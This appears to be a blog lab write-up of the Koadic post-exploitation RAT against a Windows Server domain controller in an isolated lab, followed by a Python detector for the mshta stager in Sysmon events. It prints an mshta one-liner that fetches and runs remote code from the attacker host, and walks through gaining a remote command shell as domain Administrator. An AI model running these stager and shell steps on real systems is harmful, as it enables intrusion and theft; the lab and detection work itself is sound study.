Hacking Windows Server with Koadic

Cybertech Maven
Published in System Weakness
Apr 6, 2023

Koadic, or COM Command & Control, is an open-source post-exploitation remote access tool (RAT) for Windows. Rather than dropping a compiled backdoor, it runs its implants through Windows Script Host (JScript/VBScript) and Component Object Model (COM) objects, launched from signed Microsoft binaries such as mshta.exe. Once a machine is compromised, Koadic can be used for reconnaissance, stealing data, and staging additional malware.

Koadic has a modular architecture with a server-side and a client-side component. The server, run on the attacker's machine, serves the stagers and implants over HTTP and controls the compromised Windows machines. The client side is the script code executed on the target, which polls the server for commands, runs them, and returns the results.

In this ethical hacking project, within my isolated virtual environment, I used a Kali Linux machine running Koadic as the attacker and connected remotely to a Windows Server victim machine.

I adhered to ethical standards throughout this project and never engaged in illegal or malicious activities. However, as a cybersecurity enthusiast, learning about potential vulnerabilities and attack vectors is crucial to better protect against them.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Inside the Windows Server 2019 — Domain Controller Server Manager.

To start Koadic, I first opened a Kali Linux Terminal.

Then typed koadic → pressed Enter.

Inside the Koadic tool.

Koadic contains six stagers and 46 implants. A stager is the small first-stage payload used to establish a foothold: it makes the target reach back to the Koadic server and download and execute the implant code. Each stager corresponds to a different Windows binary used to launch it; the mshta stager is used in this write-up.

Implants are the modules the server sends to a compromised Windows machine after the initial connection is established by a stager. They carry out the post-exploitation work, such as gathering host and domain information, escalating privileges, establishing persistence, or pivoting to other machines. The zombie lives inside the script host process the stager started (mshta.exe here); if that process exits, the connection is lost unless a persistence implant has been run.

Typed options → Pressed Enter.

Options displayed. Notice SRVHOST is 10.60.0.7 (the Kali host) and SRVPORT is 9999, the HTTP port the stager will be served on.

Verified the IP Address of the Kali host is 10.60.0.7 with ifconfig.

I changed ENDPOINT, the URL path the stager is served from, from the random default UOdwA to labinstall.

Typed set ENDPOINT labinstall → pressed Enter.

Typed options → Pressed Enter.

The ENDPOINT value was set to labinstall.

To start the listener, typed run → pressed Enter.

Koadic is listening.

Back on the Windows Server Domain Controller, I opened Command Prompt and typed ipconfig to take note of the IP Address: 10.60.0.9.

There are multiple ways to deliver this stager to a victim machine, but to demonstrate how the tool works, I ran the mshta one-liner directly in the Windows Server's command prompt.

Typed mshta http://10.60.0.7:9999/labinstall → pressed Enter. mshta.exe is a signed Microsoft binary; it fetches the HTA served at that URL and executes its script without writing a payload file to disk.

We have a zombie logged in as MARVEL\Administrator on the AD-DC running Windows Server 2019.

Typed zombies → Pressed Enter.

We have one Zombie alive at IP address 10.60.0.9, the Windows Server victim machine.

In Koadic, a zombie is a compromised Windows machine under the attacker's control through the Koadic RAT. Once a machine is compromised, the attacker can use the zombie to perform various tasks, including stealing data, launching additional attacks, and conducting reconnaissance.

I started interacting with Zombie 0.

Typed cmdshell 0 → pressed Enter.

We're inside the command prompt of the Windows Server victim machine as Administrator. The implant runs with the privileges of whoever launched mshta; here that was the domain administrator, so every command below runs at that level.

Typed ipconfig to see how a command runs through the Koadic tool from the Kali Linux machine.

We get the Windows server IP address 10.60.0.9.

I typed the dir command to see inside the Windows server victim directory.

Typed exit → pressed Enter to leave the cmdshell and return to the Koadic prompt to perform other tasks.
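The stager and cmdshell steps above leave a distinctive trail on the host: a signed Microsoft binary (mshta.exe) launched with an http:// argument, that same process making an outbound connection to the Koadic server, and cmd.exe appearing as its child when commands such as ipconfig and dir are run. The following is an added example, not code from Koadic or from the original write-up, that applies those three checks to Sysmon-style events (Event ID 1 process creation and Event ID 3 network connection). The sample records are constructed by hand to mirror the lab; the ProcessGuid values and the MARVEL\jdoe user are made up.

```python
"""Spot a Koadic-style mshta stager in Sysmon telemetry.

Added example: not Koadic's code or the write-up's. The events below are
constructed to mirror the lab (mshta fetching http://10.60.0.7:9999/labinstall
from cmd.exe as MARVEL\\Administrator). Field names follow Sysmon's Event ID 1
(ProcessCreate) and Event ID 3 (NetworkConnect) schema; ProcessGuid values
and the MARVEL\\jdoe user are placeholders."""
import re

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Shells and script hosts an implant would spawn to run cmdshell commands.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

SAMPLE_EVENTS = [
    # The stager from the write-up: mshta pulling a remote HTA.
    {"EventID": 1, "ProcessGuid": "{a1}", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://10.60.0.7:9999/labinstall",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"MARVEL\Administrator"},
    # The same process calling back to the Koadic server.
    {"EventID": 3, "ProcessGuid": "{a1}", "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "10.60.0.7", "DestinationPort": 9999},
    # A local HTA launched by a user from Explorer (constructed benign case).
    {"EventID": 1, "ProcessGuid": "{b2}", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"MARVEL\jdoe"},
    # cmdshell in action: the implant's host process spawning cmd.exe.
    {"EventID": 1, "ProcessGuid": "{d4}", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "User": r"MARVEL\Administrator"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    """Return (severity, reason) for a Sysmon Event ID 1, or None if nothing stands out."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "")
    if image == "mshta.exe":
        m = URL_RE.search(cmdline)
        if m:
            # The stager case: mshta fetching and running a remote HTA.
            return ("high", f"mshta.exe loading remote HTA {m.group(0)}")
        # Local .hta content is common in legacy installers; review, don't alert.
        return ("low", "mshta.exe executing local content")
    if parent == "mshta.exe" and image in SHELLS:
        # The cmdshell case: the implant runs ipconfig, dir, etc. via a child shell.
        return ("high", f"{image} spawned by mshta.exe")
    return None


def check_network_connect(ev):
    """Return (severity, reason) for a Sysmon Event ID 3 made by mshta.exe."""
    if basename(ev.get("Image", "")) != "mshta.exe":
        return None
    dst = ev.get("DestinationIp", "")
    if dst.startswith("127.") or dst == "::1":
        return None
    return ("medium", f"mshta.exe connected to {dst}:{ev.get('DestinationPort')}")


def analyze(events):
    """Run both checks over a list of events; return (ProcessGuid, severity, reason) tuples."""
    findings = []
    for ev in events:
        hit = None
        if ev.get("EventID") == 1:
            hit = check_process_create(ev)
        elif ev.get("EventID") == 3:
            hit = check_network_connect(ev)
        if hit:
            findings.append((ev.get("ProcessGuid"), hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for guid, severity, reason in analyze(SAMPLE_EVENTS):
        print(f"[{severity:6}] {guid} {reason}")
```

The low-severity branch is deliberate: mshta.exe opening a local .hta still appears in some legacy installers, so only the remote-URL launch and the shell-spawned-by-mshta cases are scored high. Where nothing in the environment legitimately depends on mshta.exe, blocking it outright with application control is the simpler preventive measure, and the Koadic stager shown in this write-up would then fail at the first step.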


Cybersecurity Researcher | Ethical Hacker | Security Analyst | Web App Pentester | Threat Intelligence